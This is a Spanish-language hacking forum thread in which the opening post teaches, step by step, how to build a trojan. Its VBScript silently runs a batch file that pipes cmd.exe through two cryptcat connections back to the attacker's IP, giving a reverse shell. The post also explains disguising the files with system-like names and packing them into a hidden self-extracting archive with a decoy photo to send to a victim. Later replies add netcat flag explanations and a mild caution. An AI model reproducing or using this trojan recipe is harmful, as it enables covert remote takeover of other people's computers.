elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Obtener shell con Cryptcat o Netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Obtener shell con Cryptcat o Netcat  (Leído 6,869 veces)
Devilboy.Devil

Desconectado Desconectado

Mensajes: 155


Ver Perfil
Obtener shell con Cryptcat o Netcat
« en: 20 Diciembre 2010, 01:51 am »

weno, les enseñaré como obtener shell con netcat o cryptcat y de este modo poder troyanisar la pc victima, a la que podamos subir y bajar archivos hasta abrir la lectora del cd aparte de muchas cosas mas ^^.

pero eso ya es cosa de la imaginación de cada uno

En lo personal prefiero Cryptcat ya que es exactamente lo mismo que netcat solo que mas seguro

para este metodo necesitamos lo siguiente:
1.-Cryptcat
2.-Winrar
3.-Nircmd
4.- Alguna foto, juego o alguna otra cosa para no levnatar sospecha
5.- Un pekeño script en visual basic y batch

Bien, manos a la obra
ponemos todos los archivos en una carpeta y renombramos los archivos, algo que no sea comun por ejemplo run32dll, igfxdll, inetcpe, etc

en este caso kedará asi:
Código:
cryptcat = run32dll
nircmd=igfxdll
script=inetcpe
foto = imon32



seguimos, en esta ocacion ocuparemos una shell volteada, esto kiere decir que ocuparemos los puertos 21 (ftp) y 25 (smtp) para que el firewall no nos moleste

el script que vamos a hacer es para que no aparezca la ventana de ms-dos al ejecutar la shell volteada en la pc victima.

el script es el siguiente:

Código:
set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe NUESTRA-IP 21 |cmd.exe| run32dll.exe NUESTRA-IP 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide

copiamos ese code en un block de notas, asegurense de cambiar donde dice "NUESTRA-IP" por su ip, recuerden que para hacer eso nos vamos a inicio-ejecutar-cmd y ahi ponemos ipconfig y nos dará nuestra ip
guardamos es script con el nombre de inetcpe.vbs

bien ya tenemos todo lo necesario, ahora solo nos keda juntarlo con el winrar de la sig manera:

seleccionamos los 4 archivos, click derecho y add to archive, o agregar al archivo



seleccionamos lo sig:
metodo de compresion: la mejor
crear archivo sfx

y borrar archivos despues de archivarlos



despues de esto, nos vamos a la pestaña "avanzado" y damos click en optiones sfx



donde dice: path to extract o localizacion de la extracción ponemos lo siguiente:
c:\widows\system32
esto es para que los archivos se extraigan dentro de la carpeta system32
y donde dice Run after extraction o ejecutar tras la estracción pones cualkier cosa



despues de esto, nos vamos a la pestaña modos y seleccionamos hide all o esconder todo y skip existing files o sobreescribir archivos



damos aceptar y nos vamos a la pestaña comentarios

nos saldrá una pantalla parecida a esta




vamos a modificar los comentarios de la sig forma:



damos aceptar y listo ya tenemos nuestro troyano creado

cambiamos el nombre a nuestro archivo por ejemplo en mi caso "album de fotos"



bien, ese archivo es el que le debemos de mandar a la victima
pero para eso antes nosotros debemos abrirl el cryptcat y poner lo siguiente:

abrimos el cryptcat y ponemos -vvlp 21
abrimos otra consola y ponemos lo siguiente -vvlp 25



una vez que le mandemos el archivo a la victima obtendremos shell

ejecuté el archivo en mi pc parta que vean y keda asi:

solo vemos la foto pero al mismo tiempo tenemos shell



una vez que tengamos shell, escribimos los comandos en la ventana donde pusimos esto -vvlp21 y en la otra ventana veran el resultado de la consulta.

ahora se preguntaran para que es el nircmd que pusimos al principio y al cual le pusimos el nombre de: igfxdll
bueno es para poder manejar un poco la pc de la victima, como por ejemplo
en la shell ponemos este comando:
igfxdll.exe open cdrom d:
y se la abrirá el cdrom a la victima ^^

weno con este programa se pueden hacer muchas maldades mas pero eso les toca a uds

espero les haya gustado el tuto


aki estan las herramientas

http://rapidshare.com/files/87150425/TUTO.rar.html

saludos

Devilboy
En línea

L4L0

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Obtener shell con Cryptcat o Netcat
« Respuesta #1 en: 27 Enero 2011, 22:31 pm »

hola ya tengo todo echo pero no entendí lo del cryptcat que es no lo avía escuchado gracias espero respuesta.
En línea

Devilboy.Devil

Desconectado Desconectado

Mensajes: 155


Ver Perfil
Re: Obtener shell con Cryptcat o Netcat
« Respuesta #2 en: 28 Enero 2011, 02:43 am »

hola ya tengo todo echo pero no entendí lo del cryptcat que es no lo avía escuchado gracias espero respuesta.

es como netcat pero mas seguro
En línea

L4L0

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Obtener shell con Cryptcat o Netcat
« Respuesta #3 en: 28 Enero 2011, 18:15 pm »

bueno jaja madamas  que no entiendo como lo saco es por linea de comando o tengo que instalar algo  encanto a cryptcat y natcat no tengo conocimientos  :huh: que yo recuerde gracias espero respuesta.

saludos.
En línea

Devilboy.Devil

Desconectado Desconectado

Mensajes: 155


Ver Perfil
Re: Obtener shell con Cryptcat o Netcat
« Respuesta #4 en: 29 Enero 2011, 17:33 pm »

bueno jaja madamas  que no entiendo como lo saco es por linea de comando o tengo que instalar algo  encanto a cryptcat y natcat no tengo conocimientos  :huh: que yo recuerde gracias espero respuesta.

saludos.

entonces antes de intentar esto te recomiendo que leeas un manual sobre netcat
En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: Obtener shell con Cryptcat o Netcat
« Respuesta #5 en: 29 Enero 2011, 22:41 pm »

Bueno, te explico rapidamente:
Código:
nc -vv -l -p 31337 == nc -vvlp 3137
Una vez claro, explicamos args.
-vv indica que nos de mucha informacion sobre todo
-l indica listen, escuchar.
-p indica el puerto que le hayais metido

------------------------------------------------------------------------------------------

Vale, ahora aclarado eso te doy mi opinion:
1) Gracias por el texto, está muy bien en general, todo paso a paso... Lo he leido casi entero jeje...
2) Este texto es una guia muy buena, pero sus usos pueden ser ligeramente malevolos. No busques hacer post aqui de ese tipo. Quiero decir que el texto es una buena guia, pero que no lo hagas con esa idea...
3) En vez de abrir dos puertos, puedes usar uno solo.
4) Deberias de hacerlo todo un codigo en lenguajes compilados. Siempre es mejor que un script... ;)

Y ahora no te lo tomes a mal, pero no le veo mucha utilidad, aparte de infectar a alguien y gastarle una buena broma. Si quieres "hackear" con eso, te aclaro que no es hackear. Espero que no me malinterpretes.
Suerte!
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Descargar Netcat, cryptcat, radmin 1.2, extension creator, etc « 1 2 3 »
Hacking
WHK 24 24,428 Último mensaje 5 Mayo 2013, 20:32 pm
por yernaten
Es posible hackear con netcat o cryptcat?
Hacking
SwitzerlandJ 3 6,094 Último mensaje 29 Octubre 2010, 04:50 am
por SwitzerlandJ
Como obtener varias shell remotas a la vez usando NETCAT?
Hacking
Synth3tik0 5 5,366 Último mensaje 10 Julio 2011, 19:22 pm
por .:UND3R:.
FTP Metasploit + Netcat = Shell Windows 7
Hacking
Milo__EscorpioN 0 2,784 Último mensaje 26 Marzo 2022, 21:25 pm
por Milo__EscorpioN
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines